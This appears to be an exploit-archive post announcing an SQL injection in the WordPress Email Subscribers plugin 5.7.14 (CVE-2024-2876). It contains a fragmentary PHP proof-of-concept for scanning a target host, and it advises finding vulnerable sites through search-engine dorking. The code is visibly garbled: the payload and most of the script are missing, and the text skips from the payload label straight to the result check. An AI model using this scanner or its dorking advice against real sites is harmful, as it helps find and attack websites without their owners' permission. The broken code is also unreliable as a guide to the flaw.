============================================================================================================================================= | # Title : wordpress Email Subscribers 5.7.14 Sql Injection vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://wordpress.org/plugins/email-subscribers/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: The Email Subscribers – Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection (Related : https://packetstorm.news/files/id/188767/ Related CVE numbers: CVE-2024-2876 ) . [+] Payload : [+] Set Target : line 52. [+] Usage : php poc.php [+] PayLoad : = 4 && $status_code == 200 && strpos($header, "application/json") !== false) { echo "SQL Injection vulnerability found!\n"; } else { echo "No vulnerability detected.\n"; } } // Close cURL session curl_close($ch); } // Example usage (Replace {{Hostname}} with the target hostname) $hostname = 'example.com'; // Change this to your target test_sql_injection($hostname); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================